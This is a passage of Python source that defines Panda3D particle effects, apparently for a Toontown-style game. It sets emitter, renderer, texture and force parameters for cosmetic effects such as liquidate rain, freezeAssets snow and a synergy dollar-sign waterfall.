    #p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/spark")
    #p0.renderer.addTextureFromFile('confetti.png')
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.0070)
    p0.renderer.setFinalXScale(0.0500)
    p0.renderer.setInitialYScale(0.0070)
    p0.renderer.setFinalYScale(0.0500)
    p0.renderer.setNonanimatedTheta(145.0080)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Disabled color-cycling experiments kept for reference:
    #p0.renderer.getColorInterpolationManager().addSinusoid(0.0,0.60000002384185791,Vec4(1.0,0.0,0.0,1.0),Vec4(0.0,1.0,0.0,1.0),0.30000001192092896,1)
    #p0.renderer.getColorInterpolationManager().addSinusoid(0.5,1.0,Vec4(0.0,0.0,1.0,1.0),Vec4(1.0,0.0,0.0,1.0),0.30000001192092896,1)
    #p0.renderer.getColorInterpolationManager().addSinusoid(0.0,1.0,Vec4(1.0,0.0,0.0,1.0),Vec4(0.0,1.0,0.0,1.0),0.5,0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Disc parameters
    p0.emitter.setRadius(0.0100)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('gravity')
    # Force parameters
    # Jitter scatters the confetti in all three axes...
    force0 = LinearJitterForce(5.0000, 0)
    force0.setVectorMasks(1, 1, 1)
    force0.setActive(1)
    f0.addForce(force0)
    # ...while a weak sink below the origin provides the fall.
    force1 = LinearSinkForce(Point3(0.0000, 0.0000, -0.8000), LinearDistanceForce.FTONEOVERRSQUARED, 0.5000, 1.0000, 1)
    force1.setVectorMasks(1, 1, 1)
    force1.setActive(1)
    f0.addForce(force1)
    self.addForceGroup(f0)
@particle
def downsizeCloud(self):
    """Build the 'downsize' cloud: yellow snow-particle sprites born
    throughout a large sphere volume and shaken by a jitter force.
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(100)
    p0.setBirthRate(0.2000)
    p0.setLitterSize(12)
    p0.setLitterSpread(4)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.3000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
    # Snow texture tinted yellow, slightly translucent.
    p0.renderer.setColor(Vec4(1.00, 1.00, 0.00, 0.80))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.015)
    p0.renderer.setFinalXScale(0.075)
    p0.renderer.setInitialYScale(0.0075)
    p0.renderer.setFinalYScale(0.055)
    p0.renderer.setNonanimatedTheta(20.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    # Negative amplitude with a zero launch vector -- presumably draws
    # particles inward toward the radiate origin; TODO confirm.
    p0.emitter.setAmplitude(-1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(2.70)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearJitterForce(14.5449, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def synergyWaterfall(self):
    """Build the 'synergy' waterfall: green dollar-sign sprites sprayed
    from a disc and pulled down by a LinearSinkForce.  Same geometry as
    waterfall() but with sprite rendering and a shallower sink.
    """
    self.reset()
    self.setPos(0.000, 5.000, 2.300)
    self.setHpr(0.000, -45.000, 0.000)
    self.setScale(4.000, 4.000, 4.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("DiscEmitter")
    p0.setPoolSize(50)
    p0.setBirthRate(0.0500)
    p0.setLitterSize(4)
    p0.setLitterSpread(1)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.1000)
    p0.factory.setLifespanSpread(0.1000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/dollar-sign")
    p0.renderer.setColor(Vec4(0.00, 1.00, 0.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.2)
    p0.renderer.setFinalXScale(0.2)
    p0.renderer.setInitialYScale(0.2)
    p0.renderer.setFinalYScale(0.2)
    p0.renderer.setNonanimatedTheta(20.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(3.5000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
    # Disc parameters
    p0.emitter.setRadius(0.2000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -15.0000), LinearDistanceForce.FTONEOVERRSQUARED, 3.0400, 1.5000, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def calculate(self):
    """Build the 'calculate' effect: audit-plus sprites that grow from
    nothing while fading out, thrown fast from a sphere volume.  Unlike
    most siblings this uses finite terminal velocity and mass spread;
    no force group is attached.
    """
    self.reset()
    self.setPos(0.000, 2.5, 3.5)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(30)
    p0.setBirthRate(0.4000)
    p0.setLitterSize(3)
    p0.setLitterSpread(1)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.9000)
    p0.factory.setLifespanSpread(0.2000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.3000)
    # Low terminal velocity (8 +/- 4) caps particle speed here.
    p0.factory.setTerminalVelocityBase(8.0000)
    p0.factory.setTerminalVelocitySpread(4.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/audit-plus")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.0000)
    p0.renderer.setFinalXScale(0.400)
    p0.renderer.setInitialYScale(0.0000)
    p0.renderer.setFinalYScale(0.400)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(11.0000)
    p0.emitter.setAmplitudeSpread(2.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -2.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.5000)
    self.addParticles(p0)
@particle
def freezeAssets(self):
    """Build the 'freeze assets' effect: white snow-particle sprites
    radiating outward from a point above the effect, shrinking over
    life, with a jitter force for scatter.
    """
    self.reset()
    self.setPos(0.000, 0.000, -0.200)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("DiscEmitter")
    p0.setPoolSize(200)
    p0.setBirthRate(0.0800)
    p0.setLitterSize(7)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.7000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    # Flakes shrink from 0.064 to near-zero as they age.
    p0.renderer.setInitialXScale(0.064)
    p0.renderer.setFinalXScale(0.001)
    p0.renderer.setInitialYScale(0.064)
    p0.renderer.setFinalYScale(0.001)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(8.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 5.0000))
    # Disc parameters
    p0.emitter.setRadius(0.4500)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearJitterForce(15.0000, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def spriteFiredFlecks(self):
    """Build the 'fired' flecks: roll-o-dex sprites drifting up out of
    a sphere volume (via the emitter's +Z offset force) and shrinking
    to nothing.  No force group is attached.
    """
    self.reset()
    self.setPos(0.000, 0.000, 2.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(60)
    p0.setBirthRate(0.200)
    p0.setLitterSize(2)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.100)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.025)
    p0.renderer.setFinalXScale(0.000)
    p0.renderer.setInitialYScale(0.025)
    p0.renderer.setFinalYScale(0.000)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    # Constant +Z offset force floats the flecks upward.
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 4.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -4.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(1.5000)
    self.addParticles(p0)
@particle
def smile(self):
    """Build the 'smile' effect: a dense ring of white sparkles that
    fade out over one second.  Note this is the only sibling with a
    nonzero setSystemLifespan, and setScale is deliberately left
    commented out.  No force group is attached.
    """
    self.reset()
    self.setPos(0.0, 0.0, 2.000)
    self.setHpr(85.000, 0.000, 90.000)
    #self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SparkleParticleRenderer")
    p0.setEmitter("RingEmitter")
    p0.setPoolSize(400)
    p0.setBirthRate(0.0200)
    p0.setLitterSize(10)
    p0.setLitterSpread(0)
    # System dies after 1 second (siblings use 0.0 = run forever).
    p0.setSystemLifespan(1.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.0000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(200.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    p0.renderer.setUserAlpha(1.00)
    # Sparkle parameters
    p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setEdgeColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setBirthRadius(0.1000)
    p0.renderer.setDeathRadius(0.0000)
    p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(1.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Ring parameters
    p0.emitter.setRadius(1.0000)
    self.addParticles(p0)
@particle
def trickleLiquidate(self):
    """Build the 'trickle liquidate' rain: a sparse stream of raindrop
    sprites falling from a point 6 units up.  Identical layout to
    liquidate() but with a smaller pool (20 vs 100) and slower birth
    rate.  No force group is attached.
    """
    self.reset()
    self.setPos(0.000, 0.000, -0.200)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(20)
    p0.setBirthRate(0.0800)
    p0.setLitterSize(3)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.4000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/raindrop")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    # Tall, narrow sprites read as falling drops.
    p0.renderer.setInitialXScale(0.06)
    p0.renderer.setFinalXScale(0.06)
    p0.renderer.setInitialYScale(0.225)
    p0.renderer.setFinalYScale(0.225)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(16.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 6.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.4500)
    self.addParticles(p0)
@particle
def reorgSpray(self):
    """Build the 'reorg' spray: tiny red snow-particle sprites sprayed
    forward from a sphere volume with a strong +Y offset force.  No
    force group is attached.
    """
    self.reset()
    self.setPos(0.000, 5.700, 2.700)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    #p0.setRenderer("PointParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(150)
    p0.setBirthRate(0.0500)
    p0.setLitterSize(7)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.8000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
    p0.renderer.setColor(Vec4(1.00, 0.00, 0.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.003)
    p0.renderer.setFinalXScale(0.009)
    p0.renderer.setInitialYScale(0.003)
    p0.renderer.setFinalYScale(0.009)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(3.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    # Strong +Y offset force pushes the spray away from the source.
    p0.emitter.setOffsetForce(Vec3(0.0000, 6.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.8900)
    self.addParticles(p0)
@particle
def liquidate(self):
    """Build the 'liquidate' rain: white raindrop sprites falling from
    a point 6 units up.  Same layout as trickleLiquidate() but with a
    larger pool (100) and a faster birth rate; acidrain() is the
    green-tinted variant.  No force group is attached.
    """
    self.reset()
    self.setPos(0.000, 0.000, -0.200)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(100)
    p0.setBirthRate(0.0400)
    p0.setLitterSize(3)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.4000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/raindrop")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.06)
    p0.renderer.setFinalXScale(0.06)
    p0.renderer.setInitialYScale(0.225)
    p0.renderer.setFinalYScale(0.225)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(16.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 6.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.4500)
    self.addParticles(p0)
@particle
def acidrain(self):
    """Build the 'acid rain' effect: identical to liquidate() except
    the raindrop sprites are tinted green.  No force group is attached.
    """
    self.reset()
    self.setPos(0.000, 0.000, -0.200)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(100)
    p0.setBirthRate(0.0400)
    p0.setLitterSize(3)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.4000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/raindrop")
    # Green tint -- the only difference from liquidate().
    p0.renderer.setColor(Vec4(0.00, 1.00, 0.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.06)
    p0.renderer.setFinalXScale(0.06)
    p0.renderer.setInitialYScale(0.225)
    p0.renderer.setFinalYScale(0.225)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(16.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 6.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.4500)
    self.addParticles(p0)
@particle
def mumboJumboSpray(self):
    """Slow spray of "mumbojumbo" word sprites with a jitter force.

    Resets this effect in place, then attaches one sprite-based particle
    system (small pool of 3, long lifespan, alpha fading out) plus a
    ForceGroup containing a single LinearJitterForce for wobble.
    """
    self.reset()
    self.setPos(0.000, 4.000, 4.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 4.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(3)
    p0.setBirthRate(0.3000)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.900)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/mumbojumbo-iron")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.40)
    p0.renderer.setFinalXScale(0.40)
    p0.renderer.setInitialYScale(0.20)
    p0.renderer.setFinalYScale(0.20)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(6.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -9.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.7000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearJitterForce(20.4636, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def gearExplosionWide(self):
